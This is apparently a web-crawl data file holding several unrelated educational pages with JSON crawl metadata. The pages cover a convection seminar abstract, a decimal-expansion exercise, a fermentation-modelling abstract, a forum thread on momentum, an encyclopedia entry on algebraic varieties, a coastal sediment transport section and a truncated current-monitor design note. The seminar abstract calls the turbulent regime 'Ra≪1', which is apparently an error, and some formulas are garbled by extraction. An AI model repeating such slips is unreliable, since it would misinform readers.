{"ft_lang_label":"__label__en","ft_lang_prob":0.5452821,"math_prob":0.99480575,"size":4550,"snap":"2023-40-2023-50","text_gpt3_token_len":1370,"char_repetition_ratio":0.37307522,"word_repetition_ratio":0.908734,"special_character_ratio":0.3320879,"punctuation_ratio":0.138833,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9985574,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T04:33:56Z\",\"WARC-Record-ID\":\"<urn:uuid:19b6b384-3f5f-4d73-bb18-2beeb1858005>\",\"Content-Length\":\"44221\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7c4cbd47-1e9c-43fc-a49b-bf9168a75c13>\",\"WARC-Concurrent-To\":\"<urn:uuid:6c28342c-3930-48b2-a98b-10fb722672fd>\",\"WARC-IP-Address\":\"193.219.28.149\",\"WARC-Target-URI\":\"http://mizar.org/version/current/html/proofs/glib_010/65\",\"WARC-Payload-Digest\":\"sha1:443NDP7VMCY33CSMZGZRTTBATWM3WEX6\",\"WARC-Block-Digest\":\"sha1:2YBVM3VOU45OPSJ3MQQ6GTD2V3SYHY5I\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506559.11_warc_CC-MAIN-20230924023050-20230924053050-00344.warc.gz\"}"}
https://www.sbai.uniroma1.it/en/node/6994
[ "## Seminario\n\nData evento:\nFriday, February 17, 2017 - 10:30\nVenerdi 17 febbraio 2017\nOre 10.30, aula 1B, Dipartimento SBAI\nSeminario di equazioni alle derivate parziali\n\nFelix Otto (MPI MIS Leipzig)\n\nRayleigh-Benard convection: Physically relevant a priori estimates\n\nWe are interested in Rayleigh-Benard convection, by which we understand the motion of a liquid in a container that is heated through the bottom and cooled through the top surface. In the Boussinesq approximation, this leads to the Navier-Stokes equations for the (divergence-free) velocity with no-slip boundary conditions coupled to an advection-diffusion equation for the temperature with inhomogeneous Dirichlet boundary conditions. The coupled system contains two nondimensional parameters: The Rayleigh Number $Ra$, that measures the strength of the imposed temperature gradient, and the Prandtl number $Pr$, that measures the strength of viscosity over inertia. We are interested in the regime of $Ra\\ll 1$, in which case the fluid motion is turbulent and the temperature features sharp boundary layers. One relevant way of measuring the turbulent transport is to monitor the Nusselt number $Nu$, which is the time and space-averaged upwards heat flux. Many (expensive) experiments and (large scale) numerical simulations display several scaling regimes for $Nu$ in terms of $Ra$ and $Pr$.\n\nIt is very surprising that rigorous PDE theory in form of a priori estimates can contribute to the understanding of these scaling regimes: In 1999, P. Constantin and C. Doering rigorously established the upper bound $Nu\\lesssim Ra^{1/3}$ (up to logarithms) in the regime of vanishing inertia, that is, for $Pr=\\infty$, in which case the Navier-Stokes equation is replaced by the quasi-static Stokes equation. This upper bound is consistent with the experimental and numerical data.\n\nWe present an extension to finite Prandlt Number (i.e. replacing the quasi-stationary Stokes by the time-dependent Navier-Stokes equation): We show that the upper bound $Nu\\lesssim Ra^{1/3}$ persists as long as $Pr\\ll Ra^{1/3}$, which goes beyond the small-data regime for Navier-Stokes.\n\nThe proof relies on a simple but curious estimate of the transport nonlinearity in terms of the dissipation rate. This estimate naturally leads to the $L^1$-norm with a singular weight depending on the distance to the no-slip boundary. Hence we need to develop a fairly involved maximal regularity theory for the instationary Stokes equation with no-slip boundary condition with respect to this norm. This is joint work with A. Choffrut and C. Nobili.\n\n© Università degli Studi di Roma \"La Sapienza\" - Piazzale Aldo Moro 5, 00185 Roma" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8876329,"math_prob":0.9823819,"size":2579,"snap":"2022-27-2022-33","text_gpt3_token_len":607,"char_repetition_ratio":0.10368932,"word_repetition_ratio":0.010471204,"special_character_ratio":0.20666926,"punctuation_ratio":0.09150327,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9878862,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-12T05:41:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e5b42802-a137-4e86-b247-c886e91b32b8>\",\"Content-Length\":\"25350\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a236313a-3b50-4e60-8339-8bb9af5e42ff>\",\"WARC-Concurrent-To\":\"<urn:uuid:05edc5e8-6b94-4e46-aa87-6e5b58fd6923>\",\"WARC-IP-Address\":\"151.100.38.73\",\"WARC-Target-URI\":\"https://www.sbai.uniroma1.it/en/node/6994\",\"WARC-Payload-Digest\":\"sha1:V6VNV4TXWLUSRTO6RKF4TAX4XZYXCFJM\",\"WARC-Block-Digest\":\"sha1:HUZSBLEL6DRVSX4YPYHIO6XOBNUKDFCS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571584.72_warc_CC-MAIN-20220812045352-20220812075352-00251.warc.gz\"}"}
https://www.teachoo.com/12330/3414/Question-1-Choice---2/category/CBSE-Class-10-Sample-Paper-for-2021-Boards---Maths-Standard/
[ "## The decimal representation of The decimal representation of 14587/(2 1 × 5 4 ) will terminate after how many decimal places?", null, "1. Class 10\n2. Solutions of Sample Papers for Class 10 Boards\n3. CBSE Class 10 Sample Paper for 2021 Boards - Maths Standard\n\nTranscript\n\nQuestion 1 (Choice - 2) The decimal representation of the decimal representation of 14587/(2^1 × 5^4 ) will terminate after how many decimal places?14587/(2^1 × 5^4 ) = 14587/(2^1 × 5^4 ) × 2^3/2^3 = (14587 × 2^3)/((2^4 × 5^4)) = (14587 × 2^3)/(2 × 5)^4 = (14587 × 2^3)/〖10〗^4 So, the number will terminate after 4 decimal places\n\nCBSE Class 10 Sample Paper for 2021 Boards - Maths Standard\n\nClass 10\nSolutions of Sample Papers for Class 10 Boards", null, "" ]
[ null, "https://d1avenlh0i1xmr.cloudfront.net/86ea794d-9c87-49e9-984b-a5b2f234bd80/slide2.jpg", null, "https://delan5sxrj8jj.cloudfront.net/misc/Davneet+Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7134212,"math_prob":0.9950322,"size":1601,"snap":"2021-31-2021-39","text_gpt3_token_len":518,"char_repetition_ratio":0.36819035,"word_repetition_ratio":0.0866426,"special_character_ratio":0.3703935,"punctuation_ratio":0.018518519,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99936813,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T17:01:49Z\",\"WARC-Record-ID\":\"<urn:uuid:46ee170b-163a-48b7-987c-95a9575f609c>\",\"Content-Length\":\"80261\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:acfee5f9-7824-47a3-9104-7e051ccc1d43>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4f73694-91c9-43c7-92d2-8bf74cf8eb02>\",\"WARC-IP-Address\":\"35.169.250.74\",\"WARC-Target-URI\":\"https://www.teachoo.com/12330/3414/Question-1-Choice---2/category/CBSE-Class-10-Sample-Paper-for-2021-Boards---Maths-Standard/\",\"WARC-Payload-Digest\":\"sha1:BFRDBPY3Y37DGZOTP2O6WOFVWRJS5MJA\",\"WARC-Block-Digest\":\"sha1:L6KHTVMGRAKP6NUNKSKXFQHD554FVYDZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150307.84_warc_CC-MAIN-20210724160723-20210724190723-00547.warc.gz\"}"}
https://pennstate.pure.elsevier.com/en/publications/application-of-mathematical-models-to-ethanol-fermentation-in-bio
[ "# Application of mathematical models to ethanol fermentation in biofilm reactor with carob extract\n\nMustafa Germec, Kuan Chen Cheng, Mustafa Karhan, Ali Demirci, Irfan Turhan\n\nResearch output: Contribution to journalArticlepeer-review\n\n10 Scopus citations\n\n## Abstract\n\nMathematical models not only ensure information about kinetic-metabolic nature of fermentations, but also facilitate their control and optimization. In the study, flexible ten models were evaluated and employed to describe the ethanol fermentation in a biofilm reactor with a carob extract medium (CEM). Findings indicated that W model well fitted the experimental data of cell growth (root mean square error (RMSE) = 0.289 g/L, mean absolute error (MAE) = 0.237 g/L, regression coefficient (R2) = 0.9944, bias factor (BF) = 1.021, and accuracy factor (AF) = 1.047), ethanol production (RMSE = 1.609 g/L, MAE = 1.277 g/L, R2 = 0.9774, BF = 1.178, and AF = 1.283), and substrate consumption (RMSE = 2.493 g/L, MAE = 1.546 g/L, R2 = 0.9931, BF = 1.001 and AF = 1.053). In the prediction of kinetic parameters, W model also gave better and well-directed results compared with the other mathematical models used in the study. When an independent set of experimental data was used in the validation of mathematical models, similar validation results were obtained and W model was also successful. Consequently, W model could be used for more progress of fermentation process in biofilm reactor with CEM, which can serve as a universal equation.\n\nOriginal language English (US) 237-252 16 Biomass Conversion and Biorefinery 10 2 https://doi.org/10.1007/s13399-019-00425-1 Published - Jun 1 2020\n\n## All Science Journal Classification (ASJC) codes\n\n• Renewable Energy, Sustainability and the Environment\n\n## Fingerprint\n\nDive into the research topics of 'Application of mathematical models to ethanol fermentation in biofilm reactor with carob extract'. Together they form a unique fingerprint." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8859521,"math_prob":0.48742813,"size":3125,"snap":"2021-31-2021-39","text_gpt3_token_len":891,"char_repetition_ratio":0.11278436,"word_repetition_ratio":0.8064516,"special_character_ratio":0.31104,"punctuation_ratio":0.1568,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9614805,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-24T12:26:09Z\",\"WARC-Record-ID\":\"<urn:uuid:7d6cd90f-593a-4d94-b274-cd31fee36596>\",\"Content-Length\":\"51520\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9c4ffb5-98dc-46c1-8f5b-20b123a38ad2>\",\"WARC-Concurrent-To\":\"<urn:uuid:5fc38c0f-704e-4a4d-a37f-455a15256018>\",\"WARC-IP-Address\":\"18.210.30.88\",\"WARC-Target-URI\":\"https://pennstate.pure.elsevier.com/en/publications/application-of-mathematical-models-to-ethanol-fermentation-in-bio\",\"WARC-Payload-Digest\":\"sha1:K2KI62DOXBQ73WLYV2L2QVXUQIGZYXNB\",\"WARC-Block-Digest\":\"sha1:QRLXH5DNPS6YK6AOQVUWVFRMWI42IOR4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150264.90_warc_CC-MAIN-20210724094631-20210724124631-00163.warc.gz\"}"}
https://www.thestudentroom.co.uk/showthread.php?t=5270304
[ "# How does momentum work in an explosion?\n\nAnnouncements\n#1\nSay we are in a situation of a particle exploding, and two particles merge from it, each going at different velocities.\n\nHow can momentum be modelled here and is the conservation of momentum applicable in such a situation?\n0\n4 years ago\n#2\nNot sure how you could model momentum here, if the particle is just exploding from still then there is no initial momentum to be conserved. But if it is colliding with another particle then momentum should be conserved from the collision. I'm doing As physics at the moment so perhaps somebody more qualified could give an accurate answer, really interesting question though!\n0\n4 years ago\n#3\n(Original post by RickHendricks)\nSay we are in a situation of a particle exploding, and two particles merge from it, each going at different velocities.\n\nHow can momentum be modelled here and is the conservation of momentum applicable in such a situation?\nYes, conservation of momentum does hold, and you apply it in the usual way, remembering that momentum is a vector. So a single \"particle\",initially at rest, splitting into two sub-particles of equal mass will leave the scene of the explosion in opposite directions at the same speed as the initial momentum is zero and therefore the sum of the momenta of the two particles after the explosion must sum to zero.\n0\n4 years ago\n#4\n(Original post by RickHendricks)\nSay we are in a situation of a particle exploding, and two particles merge from it, each going at different velocities.\n\nHow can momentum be modelled here and is the conservation of momentum applicable in such a situation?\n(Original post by Gregorius)\nYes, conservation of momentum does hold, and you apply it in the usual way, remembering that momentum is a vector. So a single \"particle\",initially at rest, splitting into two sub-particles of equal mass will leave the scene of the explosion in opposite directions at the same speed as the initial momentum is zero and therefore the sum of the momenta of the two particles after the explosion must sum to zero.\nIf the particles have different masses, they will have to leave at different speeds in order that the total momentum is 0.\n0\nX\n\nnew posts", null, "Back\nto top\nLatest\n\n### Oops, nobody has postedin the last few hours.\n\nWhy not re-start the conversation?\n\nsee more\n\n### Poll\n\nJoin the discussion\n\n#### How confident are you that you'll achieve the grades you need to get into your firm uni?\n\nI think I've exceeded the grades for my university offer (22)\n17.46%\nI think I've met the grades for my university offer (31)\n24.6%\nI think I've missed the grades for my university offer (68)\n53.97%\nSomething else (tell us in the thread) (5)\n3.97%" ]
[ null, "https://www.thestudentroom.co.uk/images/v2/icons/arrow_up.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9406478,"math_prob":0.8296301,"size":3396,"snap":"2022-27-2022-33","text_gpt3_token_len":754,"char_repetition_ratio":0.15212265,"word_repetition_ratio":0.72680414,"special_character_ratio":0.20612486,"punctuation_ratio":0.09633028,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9632185,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-14T03:27:29Z\",\"WARC-Record-ID\":\"<urn:uuid:c343a71c-70ee-47ac-86d2-87bba03a76b2>\",\"Content-Length\":\"236583\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:111d5981-4238-4fe5-b74b-065e27de2296>\",\"WARC-Concurrent-To\":\"<urn:uuid:d7c7e65b-9a62-4862-8e2c-81407b3a81be>\",\"WARC-IP-Address\":\"172.67.7.211\",\"WARC-Target-URI\":\"https://www.thestudentroom.co.uk/showthread.php?t=5270304\",\"WARC-Payload-Digest\":\"sha1:NLEEJ757CPNL7QO5ZM3TAGSGWLT555TV\",\"WARC-Block-Digest\":\"sha1:LGH5V6WN3XUB66ZRBBS2WHP5RDLRXTPK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571993.68_warc_CC-MAIN-20220814022847-20220814052847-00451.warc.gz\"}"}
https://encyclopediaofmath.org/wiki/Algebraic_systems,_variety_of
[ "# Algebraic systems, variety of\n\nA class of algebraic systems (cf. Algebraic systems, class of) of a fixed signature $\\Omega$, axiomatizable by identities, i.e. by formulas of the type\n\n$$( \\forall x _ {1} ) \\dots ( \\forall x _ {s} ) P ( f _ {1} \\dots f _ {n} ) ,$$\n\nwhere $P$ is some predicate symbol from $\\Omega$ or the equality sign, while $f _ {1} \\dots f _ {n}$ are terms of the signature $\\Omega$ in the object variables $x _ {1} \\dots x _ {s}$. A variety of algebraic systems is also known as an equational class, or a primitive class. A variety of signature $\\Omega$ can also be defined (Birkhoff's theorem) as a non-empty class of $\\Omega$- systems closed with respect to subsystems, homomorphic images and Cartesian products.\n\nThe intersection of all varieties of signature $\\Omega$ which contain a given (not necessarily abstract) class $\\mathfrak K$ of $\\Omega$- systems is called the equational closure of the class $\\mathfrak K$( or the variety generated by the class $\\mathfrak K$), and is denoted by $\\mathop{\\rm var} \\mathfrak K$. In particular, if the class $\\mathfrak K$ consists of a single $\\Omega$- system $\\mathbf A$, its equational closure is denoted by $\\mathop{\\rm var} \\mathbf A$. If the system $\\mathbf A$ is finite, all finitely-generated systems in the variety $\\mathop{\\rm var} \\mathbf A$ are also finite , .\n\nLet ${\\mathcal L}$ be a class of $\\Omega$- systems, let $S {\\mathcal L}$ be the class of subsystems of systems of ${\\mathcal L}$, let $H {\\mathcal L}$ be the class of homomorphic images of the systems from ${\\mathcal L}$, and let $\\Pi {\\mathcal L}$ be the class of isomorphic copies of Cartesian products of the systems of ${\\mathcal L}$. The following relation , is valid for an arbitrary non-empty class $\\mathfrak K$ of $\\Omega$- systems:\n\n$$\\mathop{\\rm var} \\mathfrak K = H S \\Pi \\mathfrak K .$$\n\nA variety is said to be trivial if the identity $x = y$ is true in each one of its systems. Any non-trivial variety $\\mathfrak M$ has free systems $F _ {m} ( \\mathfrak M )$ of any rank $m$ and $\\mathfrak M = \\mathop{\\rm var} F _ {\\aleph _ {0} } ( \\mathfrak M )$, .\n\nLet $S$ be a set of identities of the signature $\\Omega$ and let $KS$ be the class of all $\\Omega$- systems in which all the identities of $S$ are true. If the equality $\\mathfrak M = KS$ is satisfied for a variety $\\mathfrak M$ of signature $\\Omega$, $S$ is known as a basis for $\\mathfrak M$. A variety $\\mathfrak M$ is known as finitely baseable if it has a finite basis $S$. For any system $\\mathbf A$, a basis of the variety $\\mathop{\\rm var} \\mathbf A$ is also known as a basis of identities of the system $\\mathbf A$. If $\\mathfrak M$ is a finitely-baseable variety of algebras of a finite signature and if all algebras of $\\mathfrak M$ have distributive congruence lattices, then each finite algebra $\\mathbf A$ of $\\mathfrak M$ has a finite basis of identities . In particular, any finite lattice $\\langle \\mathbf A , \\lor, \\wedge \\rangle$ has a finite basis of identities. Any finite group has a finite basis of identities . On the other hand, there exists a six-element semi-group and a three-element groupoid without a finite basis of identities.\n\nThe varieties of $\\Omega$- systems contained in some fixed variety $\\mathfrak M$ of signature $\\Omega$ constitute under inclusion a complete lattice $L ( \\mathfrak M )$ with a zero and a unit, known as the lattice of subvarieties of the variety $\\mathfrak M$. The zero of this lattice is the variety with the basis $x = y$, $P ( x _ {1} \\dots x _ {n} )$( $P \\in \\Omega$), while its unit is the variety $\\mathfrak M$. If the variety $\\mathfrak M$ is non-trivial, the lattice $L ( \\mathfrak M )$ is anti-isomorphic to the lattice of all fully-characteristic congruences (cf. Fully-characteristic congruence) of the system $F _ {\\aleph _ {0} } ( \\mathfrak M )$ of countable rank which is free in $\\mathfrak M$. The lattice $L _ \\Omega$ of all varieties of signature $\\Omega$ is infinite, except for the case when the set $\\Omega$ is finite and consists of predicate symbols only. The exact value of the cardinality of the infinite lattice $L _ \\Omega$ is known . The lattice of all lattice varieties is distributive and has the cardinality of the continuum , . The lattice of all group varieties is modular, but it is not distributive , . The lattice of varieties of commutative semi-groups is not modular .\n\nAtoms of the lattice $L _ \\Omega$ of all varieties of signature $\\Omega$ are known as minimal varieties of signature $\\Omega$. Every variety with a non-unit system contains at least one minimal variety. If the $\\Omega$- system $\\mathbf A$ is finite and of finite type, then the variety $\\mathop{\\rm var} \\mathbf A$ contains only a finite number of minimal subvarieties .\n\nLet $\\mathfrak A , \\mathfrak B$ be subvarieties of a fixed variety $\\mathfrak M$ of $\\Omega$- systems. The Mal'tsev product $\\mathfrak A _ {\\mathfrak M} \\circ \\mathfrak B$ denotes the class of those systems $\\mathbf A$ of $\\mathfrak M$ with a congruence $\\theta$ such that $( \\mathbf A / \\theta ) \\in \\mathfrak B$, and all cosets $a / \\theta$( $a \\in \\mathbf A$), which are systems in $\\mathfrak M$, belong to $\\mathfrak A$. If $\\mathfrak M$ is the variety of all groups and if $\\mathfrak A$ and $\\mathfrak B$ are subvarieties of it, then the product $\\mathfrak A _ {\\mathfrak M} \\circ \\mathfrak B$ is identical with the Neumann product . The product of varieties of semi-groups need not be a variety. A variety $\\mathfrak M$ of $\\Omega$- systems is called polarized if there exists a term $e (x)$ of the signature $\\Omega$ such that in each system from $\\mathfrak M$ the identities $e(x) = e(y)$, $F(e(x) \\dots e(x)) = e (x)$( $F \\in \\Omega$) are true. If $\\mathfrak M$ is a polarized variety of algebras and the congruences in all algebras in $\\mathfrak M$ are commutable, then the Mal'tsev product $\\mathfrak A _ {\\mathfrak M} \\circ \\mathfrak B$ of any subvarieties $\\mathfrak A$ and $\\mathfrak B$ in $\\mathfrak M$ is a variety. One may speak, in particular, of the groupoid $G _ {I} ( \\mathfrak M )$ of subvarieties of an arbitrary variety $\\mathfrak M$ of groups, rings, etc. If $\\mathfrak M$ is the variety of all groups or all Lie algebras over a fixed field $P$ of characteristic zero, then $G _ {I} ( \\mathfrak M )$ is a free semi-group .\n\nHow to Cite This Entry:\nAlgebraic systems, variety of. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Algebraic_systems,_variety_of&oldid=45068\nThis article was adapted from an original article by D.M. Smirnov (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7812214,"math_prob":0.99994063,"size":8163,"snap":"2021-43-2021-49","text_gpt3_token_len":2483,"char_repetition_ratio":0.21681578,"word_repetition_ratio":0.17037508,"special_character_ratio":0.32549307,"punctuation_ratio":0.12067841,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000045,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T15:37:12Z\",\"WARC-Record-ID\":\"<urn:uuid:e1b92984-ea2e-4c43-811e-4f83829e6e2e>\",\"Content-Length\":\"24071\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16e5b1a9-4e24-4985-816d-c96f759c1f67>\",\"WARC-Concurrent-To\":\"<urn:uuid:ec940262-2084-44d5-8333-c31539a6dc8c>\",\"WARC-IP-Address\":\"34.96.94.55\",\"WARC-Target-URI\":\"https://encyclopediaofmath.org/wiki/Algebraic_systems,_variety_of\",\"WARC-Payload-Digest\":\"sha1:4TVNM6YJ5D45WPZBP3CA7Q3KOYGVMDWK\",\"WARC-Block-Digest\":\"sha1:PF7FS42U23GGDLDSQUNTIISNIML4LDNA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585424.97_warc_CC-MAIN-20211021133500-20211021163500-00483.warc.gz\"}"}
https://geo.libretexts.org/Bookshelves/Oceanography/Coastal_Dynamics_(Bosboom_and_Stive)/09%3A_Longshore_transport_and_coastline_changes/9.02%3A_Longshore_transport_formulations/8.2.2%3A_Cross-shore_distribution_of_longshore_transport
[ "# 8.2.2: Cross-shore distribution of longshore transport\n\n$$\\newcommand{\\vecs}{\\overset { \\rightharpoonup} {\\mathbf{#1}} }$$ $$\\newcommand{\\vecd}{\\overset{-\\!-\\!\\rightharpoonup}{\\vphantom{a}\\smash {#1}}}$$$$\\newcommand{\\id}{\\mathrm{id}}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\kernel}{\\mathrm{null}\\,}$$ $$\\newcommand{\\range}{\\mathrm{range}\\,}$$ $$\\newcommand{\\RealPart}{\\mathrm{Re}}$$ $$\\newcommand{\\ImaginaryPart}{\\mathrm{Im}}$$ $$\\newcommand{\\Argument}{\\mathrm{Arg}}$$ $$\\newcommand{\\norm}{\\| #1 \\|}$$ $$\\newcommand{\\inner}{\\langle #1, #2 \\rangle}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\id}{\\mathrm{id}}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\kernel}{\\mathrm{null}\\,}$$ $$\\newcommand{\\range}{\\mathrm{range}\\,}$$ $$\\newcommand{\\RealPart}{\\mathrm{Re}}$$ $$\\newcommand{\\ImaginaryPart}{\\mathrm{Im}}$$ $$\\newcommand{\\Argument}{\\mathrm{Arg}}$$ $$\\newcommand{\\norm}{\\| #1 \\|}$$ $$\\newcommand{\\inner}{\\langle #1, #2 \\rangle}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$$$\\newcommand{\\AA}{\\unicode[.8,0]{x212B}}$$", null, "Figure 8.1: Example of model results (longshore current velocity $$V(x)$$, longshore transport rates $$s_y (x)$$ and transport integrated over the cross-shore $$S_y$$) computed with Unibest-CL+ (https://www.deltares.nl/en/software/unibest-cl) for a 2012 measured profile near Egmond (transect 7003850 from JARKUS, n.d.) using $$D_{50} = 200\\ \\mu m$$ and $$D_{90} = 300\\ \\mu m$$.\n\nThe cross-shore distribution of longshore sediment transport is, of course, strongly determined by the cross-shore distribution of the longshore current. The longshore current distribution on a barred beach for different wave conditions (Fig. 5.42) is repeated in Fig. 8.1a. Besides, Fig. 8.1 shows the longshore transport rates as calculated with the longshore sediment transport model Unibest-$$CL_+$$. Comparing the upper and middle panel of Fig. 8.1a while keeping Eqs. 8.2.1.1 and 8.2.1.3 in mind, we may conclude that most of the sediment stirring takes place in a relatively narrow zone on the seaward flanks of the breaker bars, where most of the wave-breaking takes place. Also note the non-linear dependency of the transport on the velocity. Figure 8.1b demonstrates that the outcomes of uncalibrated transport formulas may differ substantially.", null, "Figure 8.2: Comparison between calculated and measured cross-shore distribution of long-shore sediment transport rate for one run of the SandyDuck experiment (98/02/04). Adapted from Bayram et al. (2001). The letters indicate different models, with amongst them B: Bijker (Eq. 6.5.4.1), BI: Bailard-Inman (Sect. 6.7.2), VR: Van Rijn (Eq. 6.6.1.5 for suspended load plus separate bed load formula).\n\nBayram et al. (2001) analyse the cross-shore distribution of longshore sediment trans- port according to a few well-known predictive formulas and field measurements at Duck, North Carolina. Measured hydrodynamics were used as much as possible as input for the transport models. The transport models were used with standard coefficient values without further calibration. Figure 8.2 gives the result for one specific condition ($$H_{rms} = 3.18\\ m, T_p = 12.8\\ s$$) representative for a large transport on a barred sandy profile during a storm. The mean longshore current velocity in the surf zone was $$0.6\\ m/s$$. The water depth at the most offshore measurement point was 8.6 m. The peak in the transport rate was observed some distance shoreward of the bar crest, whereas the formulas predicted the peak to occur more seaward (i.e., close to the bar crest).\n\nFor this specific run, most formulas overpredict the sediment transport. Further, the differences between the various models are rather large. The used formulas differ particularly in the way the influence of the waves has been taken into account. Besides, sensitivities to certain input parameters vary between the formulas. This could be seen from runs under different conditions that showed a different relative behaviour of the various formulas. Differences in total transports between the various transport formulas can easily be up to a factor ten! This illustrates the need for calibration of the formulations before results from computer computations can be used in specific coastal engineering cases. The data used for calibration should be representative for the considered site and hydrodynamics conditions. Examples of such calibration data are observed coastline changes following a certain ‘event’ (such as the construction of a new harbour along a coastline, or the damming of a river and the subsequent erosion of the shoreline of the river delta).\n\nThis page titled 8.2.2: Cross-shore distribution of longshore transport is shared under a CC BY-NC-SA 4.0 license and was authored, remixed, and/or curated by Judith Bosboom & Marcel J.F. Stive (TU Delft Open) via source content that was edited to the style and standards of the LibreTexts platform; a detailed edit history is available upon request." ]
[ null, "https://geo.libretexts.org/@api/deki/files/17277/%25E6%2588%25AA%25E5%25B1%258F2021-11-09_%25E4%25B8%258B%25E5%258D%258810.04.47.png", null, "https://geo.libretexts.org/@api/deki/files/17278/%25E6%2588%25AA%25E5%25B1%258F2021-11-09_%25E4%25B8%258B%25E5%258D%258810.07.32.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9111076,"math_prob":0.9914879,"size":2854,"snap":"2023-40-2023-50","text_gpt3_token_len":604,"char_repetition_ratio":0.14350878,"word_repetition_ratio":0.004597701,"special_character_ratio":0.2067274,"punctuation_ratio":0.117870726,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97186285,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-08T19:43:22Z\",\"WARC-Record-ID\":\"<urn:uuid:b4952862-cb3e-4185-b97c-c31c1cb9fec8>\",\"Content-Length\":\"124498\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fe128215-c1a6-4599-9891-b62c18376445>\",\"WARC-Concurrent-To\":\"<urn:uuid:1f1ea06f-c61b-4cf5-97da-ae2ad0b84762>\",\"WARC-IP-Address\":\"3.162.103.49\",\"WARC-Target-URI\":\"https://geo.libretexts.org/Bookshelves/Oceanography/Coastal_Dynamics_(Bosboom_and_Stive)/09%3A_Longshore_transport_and_coastline_changes/9.02%3A_Longshore_transport_formulations/8.2.2%3A_Cross-shore_distribution_of_longshore_transport\",\"WARC-Payload-Digest\":\"sha1:GYSA2V6UFBIPK54AP3DUUNQTF7RKXG34\",\"WARC-Block-Digest\":\"sha1:S6GURMKSFL4OLE7GKL3XGQHLQ2E6MFZQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100769.54_warc_CC-MAIN-20231208180539-20231208210539-00021.warc.gz\"}"}
https://www.analog.com/jp/design-notes/highvoltage-programmablegain-current-monitor.html
[ "# High-Voltage, Programmable-Gain Current Monitor\n\n### 要約\n\nThis circuit monitors current flow at high voltage (48V and higher) using a standard 5V difference amplifier (MAX4198) referenced to ground. It also employs a digital potentiometer (MAX5402) for gain adjustment.\n\nA similar version of this article appeared in the June 1, 2007 issue of PET.\n\nTelcom, LDMOS, automotive, and numerous other applications require the measurement of current flow at high voltages (high-side current). Often, a circuit operating at 5V must monitor currents at 48V. Techniques using costly high-voltage difference amplifiers and other special devices can measure such currents, but the circuit of Figure 1 does it with a standard 5V difference amp, including provisions for gain adjustment.", null, "Figure 1. This circuit monitors a current at 48V, produces a maximum output voltage of approximately 5V, and includes digitally programmable gain to accommodate wide variations in the monitored current.\n\nThe difference amp (U1, MAX4198) combines gain accuracy with low-power operation, but its maximum supply voltage is only 7.5V. To overcome this limitation, the pnp transistor Q1 transforms U1's voltage output to current. Thus, Q1's current output bridges the gap between 